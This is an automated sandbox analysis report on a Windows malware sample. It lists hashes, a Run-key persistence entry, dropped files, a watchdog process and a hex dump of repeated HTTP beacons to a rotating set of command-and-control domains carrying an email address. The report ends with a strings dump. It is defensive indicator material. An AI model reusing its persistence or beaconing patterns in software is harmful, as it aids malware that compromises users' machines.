Analysis Date: 2015-05-12 20:51:30

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: d6ae44bcc8b8b69d03ba4cb639260f13 sha1: 1565d215c53d7496b3709e84b14e04ac20c44347 size: 298496
Section .rdata md5: ea394742f85fe6d1f4c517445969616d sha1: 994815a2e26e4639f0857505e7117fae9e058a17 size: 34304
Section (name not recovered) md5: 8c6186c88aeefddece8b8d232563f91e sha1: d1ab75f705d6094663f92374048f6aa52c2b41d4 size: 95232
Timestamp: 2014-10-30 10:06:20
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Accounts TP Hardware AuthIP Storage ➝ C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe

↳ C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe

Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.mmy
Creates File: C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\jikkpxkwvy.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ijfkdasmkjjmxh\nxherkr.exe"

Network Details:
Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1038 ➝
Flows TCP: 192.168.1.1:1039 ➝
Flows TCP: 192.168.1.1:1040 ➝
Flows TCP: 192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2065 6c656374 72696364   .Host: electricd
0x00000070 (00112)   65766963 652e6e65 740d0a0d 0a         evice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 72616465 73657474   .Host: tradesett
0x00000070 (00112)   6c652e6e 65740d0a 0d0a0a0d 0a         le.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 74726565 74646576   .Host: streetdev
0x00000070 (00112)   6963652e 6e65740d 0a0d0a0d 0a         ice.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2062 65747465 72646576   .Host: betterdev
0x00000070 (00112)   6963652e 6e65740d 0a0d0a0d 0a         ice.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2066 6c696572 6265666f   .Host: flierbefo
0x00000070 (00112)   72652e6e 65740d0a 0d0a0a0d 0a         re.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206e 69676874 73707269   .Host: nightspri
0x00000070 (00112)   6e672e6e 65740d0a 0d0a0a0d 0a         ng.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 61707461 696e7375   .Host: captainsu
0x00000070 (00112)   63636573 732e6e65 740d0a0d 0a         ccess.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2065 6c656374 72696373   .Host: electrics
0x00000070 (00112)   7072696e 672e6e65 740d0a0d 0a         pring.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 72616465 73707269   .Host: tradespri
0x00000070 (00112)   6e672e6e 65740d0a 0d0a0a0d 0a         ng.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 74726565 74737563   .Host: streetsuc
0x00000070 (00112)   63657373 2e6e6574 0d0a0d0a 0a         cess.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706e61 64796131 36407961   mail=pnadya16@ya
0x00000020 (00032)   686f6f2e 6672266d 6574686f 643d706f   hoo.fr&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 74726565 7462616e   .Host: streetban
0x00000070 (00112)   6b65722e 6e65740d 0a0d0a0a 0a         ker.net......


         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
invalid string position
isapcuhx pzpapunpe dsmoqp eisu iacjagup cishe ficlua vjg gvbacrm kls cubr rge jfmoeija nkea goscobrv ctsos fisbo fizwumlcub aidpgeeeq abnm mptagdv peoqgejzuv fva bacono bfe cgb cab fqx fjzipubu dapejeulwn gqleagmb tgdeimgn spotidpdo pviculc qkzirpz pfbumperu dbqezb dfdip znh gzvoognm otnen abqgopd gtvulhju abbvu fesyun vbnasdsurl dbwedspeou dmoesuoe dvs wegwu hewt jspamczevz dccass nonnininw gmab irmjimvpe fxji ugvaoxojw vodjabpzoz plmevcna ngmuwcsid nce bglebccui pxodu onrgig cvleml snaecuz mgma ospreqooos mywuaj drcalwhunp embbufca asljuefj ecwficf rcbei uzoc lcsuvpyopd nskau kcvizrgul osmjobjke rrrifdyuu cbyoomnfo mltitqguu pnbuhb pnfuhbto loxda frjeezmgol sets ibk bzbatbof uaupbuanel ffoineuee ruvl sosl qsv ejtroqhrog lftew evtouah fmnifdaui jmloebt nzpu figj cbpe wfhu xzfi belluo zifqaxfubu cbnar cnpubr dgs krfuxciwa urluguu fdteqso llmu fzzes ovkdun plm xsfaa spsa iaucv ddlougumn onnpu ompbejubic pmuj fspablja lsva lrci khnannelob bunbiolbj hdjoatuit cbbabn kxalic uraeufme rlnugc rgzakxosu tcgiy jbdi cft furoduzc bqm ilns lyopihuol pfamuaw ifvqedbj xmfij kdhiicpain ocpfusg znwijb drtaxsvaks smgoadizg dqfatrxa lgizeajg ccbapgik ckjogngo efrco odyput irsopeoje gmlavdt rfoole jomm ftselbgetj tnvascib dat jroa obrfeejdr cbjabqgi frtabujgap dbedup rwfupht fgruhaj zvnonqapa gdfem npkehjjo wbseqobu sismaph gioreku iey tnq ucdc vculuu buln aijvlo ywpaucagm wfdeaai namnepoc tedfeqag pgguep jqg fpup vbzappj gfjazc ecirlejk crcitm lssurarudi ttliylnusw ifabbabin bdhoclba sur ugghemate corpil orpbu bhgescifof zjoozobzg rfbiia scigifklah vngievme dcxap asnz sanciub dqxi jbfod groifujv gdxid boigfe drca ddru pobqillcil uzgeobumx qfow wck kis cnp ngmiejcq wojsu gxjo gjmien zcbouw ffz dvuawax ils lwumi wjbiek sjjufc scmupa fhogeucmiz lkre rnot tgbujcanuc brdeisgp okcfou otiei cwyir ndqepo jdpexsv amgbabojj wue pie srapamfbi aidcfoh pbpezvf vnj adgdel bjledc ngpovd
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
? pm>@e
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	lsjD
v	N+D$
